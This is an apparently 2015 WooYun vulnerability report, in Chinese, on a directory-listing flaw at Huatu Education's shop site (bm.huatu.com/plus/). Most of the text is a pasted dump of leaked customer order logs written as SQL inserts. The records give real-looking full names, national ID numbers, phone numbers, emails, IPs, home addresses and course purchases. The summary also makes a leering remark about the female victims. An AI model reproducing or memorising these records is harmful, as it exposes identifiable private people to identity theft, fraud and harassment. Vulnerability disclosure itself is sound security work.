
漏洞概要

缺陷编号:wooyun-2015-0162958

漏洞标题:点到为止之华图教育多个漏洞打包(大量用户订单敏感信息--截止今日信息)

相关厂商:华图教育

漏洞作者: 带头大哥

提交时间:2015-12-21 11:25

修复时间:2016-02-04 17:47

公开时间:2016-02-04 17:47

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:



漏洞详情

披露状态:

2015-12-21: 细节已通知厂商并且等待厂商处理中
2015-12-22: 厂商已经确认,细节仅向厂商公开
2016-01-01: 细节向核心白帽子及相关领域专家公开
2016-01-11: 细节向普通白帽子公开
2016-01-21: 细节向实习白帽子公开
2016-02-04: 细节向公众公开

简要描述:

包括但不限于姓名、电话、邮箱、家庭地址、订单、教育情况等。大多为美女哦~

详细说明:

0x01:目录遍历

http://bm.huatu.com/plus/


2015-12-20_161142.png


2015-12-20_161432.png


bm.huatu.com是商城站点,上面的/plus/目录可以被直接浏览,因此大量用户订单敏感信息泄露。信息量太大,我只贴一小段,点到为止:

date:20151220131740
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450587909RN690','2316096','1','258.00','0','202.101.102.194','1450588660','1','2','0','258','bm5.huatu.com','18649850225');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643975','S-P1450587909RN690','2316096','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51608','福州分校','闽侯分部','54','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2316096','S-P1450587909RN690','林思敏','350625199304271522','女','18649850225','[email protected]','','应届','','','','');
date:20151220132215
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450588789RN154','2285185','1','3280.00','0','61.55.250.123','1450588935','1','2','0','3280','bm5.huatu.com','18232163775');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('637392','S-P1450588789RN154','2285185','2015年河北省邯郸市事业单位考试笔试-提高特训班GHBSY51529','3280.00','1','GHBSY51529','河北分校','邯郸学习中心','99','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2285185','S-P1450588789RN154','崔飞飞','130428199311102345','女','18232163775','[email protected]','','在职','','','','');
date:20151220132304
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450588885RN149','2312748','1','12.00','0','117.136.66.136','1450588984','1','2','0','12','bm5.huatu.com','18205150176');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('642570','S-P1450588885RN149','2312748','2016年江苏省考笔试辅导课程','12.00','1','GJSSK016201','南京分校','南京分部','24','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2312748','S-P1450588885RN149','张思敏','321084199412272146','女','18205150176','[email protected]','','应届','','','','');
date:20151220132448
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450588935RN131','2285185','1','3280.00','0','61.55.250.123','1450589088','1','2','0','3280','bm5.huatu.com','13832324363');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('637392','S-P1450588935RN131','2285185','2015年河北省邯郸市事业单位考试笔试-提高特训班GHBSY51529','3280.00','1','GHBSY51529','河北分校','邯郸学习中心','99','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2285185','S-P1450588935RN131','张雪彬','130425199101217137','男','13832324363','[email protected]','','在职','','','','');
date:20151220132522
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450588428RN891','1024700','1','19800.00','0','175.22.6.42','1450589122','1','2','0','19800','bm5.huatu.com','13567171391');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('622089','S-P1450588428RN891','1024700','2016年浙江省公务员考试笔试辅导课程','19800.00','1','GZJSK016004','浙江分校','杭州总部','472','','9800','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('1024700','S-P1450588428RN891','张雷','330329199012301174','男','13567171391','[email protected]','','其它','','其它','手机信息','浙江省温州市泰顺县三魁镇下武洋村');
date:20151220132718
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450588984RN868','2312748','1','12.00','0','117.136.66.136','1450589238','1','2','0','12','bm5.huatu.com','18205150176');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('642570','S-P1450588984RN868','2312748','2016年江苏省考笔试辅导课程','12.00','1','GJSSK016201','南京分校','南京分部','24','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2312748','S-P1450588984RN868','张思敏','321084199412272146','女','18205150176','[email protected]','','应届','','','','');
date:20151220133431
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450588053RN228','2316933','1','19.00','0','175.9.198.173','1450589671','1','2','0','19','bm5.huatu.com','18274821784');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('635007','S-P1450588053RN228','2316933','2016年湖南省长沙市河东分校省考笔试视频直播七点半课堂GCSSKD1611A','19.00','1','GCSSKD1611A','长沙分校','长沙总部','90','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2316933','S-P1450588053RN228','向群','433101199209102020','女','18274821784','[email protected]','','在职','','','','');
date:20151220133432
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450589345RN611','2316950','1','99.00','0','43.226.121.88','1450589672','1','2','0','99','bm5.huatu.com','15024384917');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639940','S-P1450589345RN611','2316950','2016年浙江省公务员考试培训辅导课程','99.00','1','GZJSKE16013','浙江分校','金华学习中心','72','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2316950','S-P1450589345RN611','黄林美','330722199103196469','女','15024384917','[email protected]','','在职','','','','');
date:20151220133631
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450589722RN862','2116687','1','99.00','0','43.226.121.88','1450589791','1','2','0','99','bm5.huatu.com','18267932875');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639457','S-P1450589722RN862','2116687','2016年浙江省公务员笔试考试辅导课程','99.00','1','GZJSK016888','浙江分校','杭州总部','72','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2116687','S-P1450589722RN862','胡冰洁','330621199309227142','女','18267932875','[email protected]','','在职','','','','磐安县安文镇海螺街1号磐安县文化广电新闻出版局');
date:20151220133954
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450589777RN600','2316978','1','880.00','0','60.22.179.48','1450589994','1','2','0','660','bm5.huatu.com','18524279908');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('638193','S-P1450589777RN600','2316978','2016年省考公安基础知识提前学GLNSKSP01601','880.00','1','GLNSKSP01601','沈阳分校','沈阳总部','72','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2316978','S-P1450589777RN600','郭美辰','211102199002480024','女','18524279908','[email protected]','','在职','','','','盘锦市兴隆台区双兴宾馆对面华图教育');
date:20151220134053
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450589861RN418','1162410','1','99.00','0','112.17.237.23','1450590053','1','2','0','99','bm5.huatu.com','13666895489');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639457','S-P1450589861RN418','1162410','2016年浙江省公务员笔试考试辅导课程','99.00','1','GZJSK016888','浙江分校','杭州总部','72','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('1162410','S-P1450589861RN418','王寅','331002199204230010','男','13666895489','[email protected]','','在职','','其它','朋友推荐','');
date:20151220135846
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450577158RN883','2316665','1','4980.00','0','14.217.78.22','1450591126','1','2','0','4980','bm5.huatu.com','15625001438');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('641111','S-P1450577158RN883','2316665','2016年东莞市教师招聘面试导师封闭特训班TMSZJS11624','4980.00','1','TMSZJS11624','深圳分校','深圳总部','60','','0','','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2316665','S-P1450577158RN883','刘淑娴','44190019940523436X','女','15625001438','[email protected]','','应届','','网络','华图网站','');
date:20151220140023
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450591132RN182','1506712','1','9.90','0','183.61.37.28','1450591223','1','2','0','9.9','bm5.huatu.com','13158949621');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('641883','S-P1450591132RN182','1506712','2016年海南省公务员考试视频直播课程','9.90','1','GHKSK01646','海南分校','海口总部','38','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('1506712','S-P1450591132RN182','陈慧慧','46003319881018004X','女','13158949621','[email protected]','','在职','','','','');
date:20151220140710
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450591557RN443','573731','1','258.00','0','36.250.94.130','1450591630','1','2','0','258','bm5.huatu.com','15806027313');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643975','S-P1450591557RN443','573731','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51608','福州分校','闽侯分部','54','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('573731','S-P1450591557RN443','柯江云','350583199007171056','男','15806027313','[email protected]','','在职','','网络','分类信息网站','');
date:20151220140904
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450577887RN151','1585096','1','4080.00','0','140.246.12.194','1450591744','1','2','0','4080','bm5.huatu.com','18661825369');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('640483','S-P1450577887RN151','1585096','2016年山东省农信社及青岛农商银行考试笔试辅导课程名师模块班GQDNX01603','4080.00','1','GQDNX01603','青岛分校','青岛总部','108','','1100','','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('1585096','S-P1450577887RN151','赵月','370214199401034548','女','18661825369','[email protected]','','应届','','网络','华图网站','');
date:20151220141106
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450591738RN221','1851629','1','99.00','0','220.191.253.25','1450591866','1','2','0','99','bm5.huatu.com','13857092145');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639457','S-P1450591738RN221','1851629','2016年浙江省公务员笔试考试辅导课程','99.00','1','GZJSK016888','浙江分校','杭州总部','72','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('1851629','S-P1450591738RN221','范佳华','332526198706253516','男','13857092145','[email protected]','','在职','','','','丽水市继光街27号310室');
date:20151220141622
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450591873RN936','2317046','1','258.00','0','218.106.150.254','1450592182','1','2','0','258','bm5.huatu.com','15980566164');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643976','S-P1450591873RN936','2317046','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51607','福州分校','闽侯分部','54','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2317046','S-P1450591873RN936','游厦莲','350128199306050928','女','15980566164','[email protected]','','应届','','其它','朋友推荐','福建省福州市闽侯县上街镇福建江夏学院生活区');
date:20151220141724
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450592126RN688','1587197','1','49.00','0','182.105.8.204','1450592244','1','2','0','49','bm5.huatu.com','13767895570');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643328','S-P1450592126RN688','1587197','2016年江西省教师招聘笔试','49.00','1','TBJXJS01600','南昌分校','南昌分部','21','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('1587197','S-P1450592126RN688','叶谢丽莎','360302199301064529','女','13767895570','[email protected]','','其它','','网络','华图网站','江西省萍乡市安源区滨河东路同聚大酒店往北桥方向100米(可叫中碗菜代收)');
date:20151220142409
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450592244RN207','1587197','1','49.00','0','182.105.8.204','1450592649','1','2','0','49','bm5.huatu.com','13767895570');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643328','S-P1450592244RN207','1587197','2016年江西省教师招聘笔试','49.00','1','TBJXJS01600','南昌分校','南昌分部','21','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('1587197','S-P1450592244RN207','叶谢丽莎','360302199301064529','女','13767895570','[email protected]','','其它','','网络','华图网站','江西省萍乡市安源区滨河东路同聚大酒店往北桥方向100米(可叫中碗菜柜台代收)');
date:20151220143752
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450593299RN434','2310524','1','11000.00','0','113.84.223.183','1450593472','1','2','0','11000','bm5.huatu.com','15915814149');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('644222','S-P1450593299RN434','2310524','圣诞活动班号GSZPRZ01608Y','11000.00','1','GSZPRZ01608Y','深圳分校','深圳总部','273','','3000','','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2310524','S-P1450593299RN434','郑则坤','440582199012010914','男','15915814149','[email protected]','','在职','','','','');
date:20151220144105
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450593587RN850','2187376','1','49.00','0','14.17.37.43','1450593665','1','2','0','49','bm5.huatu.com','18370881269');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643328','S-P1450593587RN850','2187376','2016年江西省教师招聘笔试','49.00','1','TBJXJS01600','南昌分校','南昌分部','21','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2187376','S-P1450593587RN850','李晓海','360722199010103660','女','18370881269','[email protected]','','在职','','网络','华图网站','江西省赣州市上犹县梅水乡洋田村');
date:20151220144231
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450593472RN886','2310524','1','11000.00','0','113.84.223.183','1450593751','1','2','0','11000','bm5.huatu.com','15915814149');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('644222','S-P1450593472RN886','2310524','圣诞活动班号GSZPRZ01608Y','11000.00','1','GSZPRZ01608Y','深圳分校','深圳总部','273','','3000','','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2310524','S-P1450593472RN886','郑则坤','440582199012010914','男','15915814149','[email protected]','','在职','','','','');
date:20151220144601
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450593602RN745','1609559','1','5320.00','0','61.191.254.226','1450593961','1','2','0','5320','bm5.huatu.com','15055136368');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643169','S-P1450593602RN745','1609559','2015年下半年合肥市直事业单位面试全封闭密训营','5320.00','1','MAHSY01588C','安徽分校','合肥总部','72','5320','420','AHSY201511280018','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('1609559','S-P1450593602RN745','李样','340822199305036284','女','15055136368','[email protected]','','其它','','','','');
date:20151220145548
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450594479RN753','2315671','1','258.00','0','27.151.185.190','1450594548','1','2','0','258','bm5.huatu.com','15205913632');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643976','S-P1450594479RN753','2315671','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51607','福州分校','闽侯分部','54','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2315671','S-P1450594479RN753','许灿荣','350521199112165011','男','15205913632','[email protected]','','在职','','','','');
date:20151220145807
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450594603RN130','867256','1','258.00','0','58.23.79.20','1450594687','1','2','0','258','bm5.huatu.com','15906063627');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643976','S-P1450594603RN130','867256','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51607','福州分校','闽侯分部','54','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('867256','S-P1450594603RN130','林丽芳','350583199112018088','女','15906063627','[email protected]','','在职','','网络','华图网站','');
date:20151220151337
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450594856RN317','2317122','1','258.00','0','175.43.82.103','1450595617','1','2','0','258','bm5.huatu.com','15880806389');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643976','S-P1450594856RN317','2317122','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51607','福州分校','闽侯分部','54','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2317122','S-P1450594856RN317','柯燕芳','350583199205101040','女','15880806389','[email protected]','','在职','','网络','QQ','');
date:20151220152141
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450595984RN225','2317147','1','4780.00','0','120.43.85.32','1450596101','1','2','0','4780','bm5.huatu.com','13605929082');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('630018','S-P1450595984RN225','2317147','2015年事业单位面试辅导课程 实战突破班 MXMSY01538','4780.00','1','MXMSY01538','厦门分校','厦门总部','48','','500','','',2)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2317147','S-P1450595984RN225','刘子瑞','350821198611040418','男','13605929082','[email protected]','','其它','','网络','华图网站','');
date:20151220152726
INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`)
VALUES ('S-P1450596084RN551','2052263','1','1680.00','0','183.62.131.1','1450596446','1','2','0','1680','bm5.huatu.com','15918638599');
INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('642456','S-P1450596084RN551','2052263','2015年深圳市考在职特训班GSZPRZ01609D','1680.00','1','GSZPRZ01609D','深圳分校','深圳总部','120','','0','','',0)
INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`)
VALUES ('2052263','S-P1450596084RN551','郑楚玲','440183198212225821','女','15918638599','[email protected]','','在职','','','','');
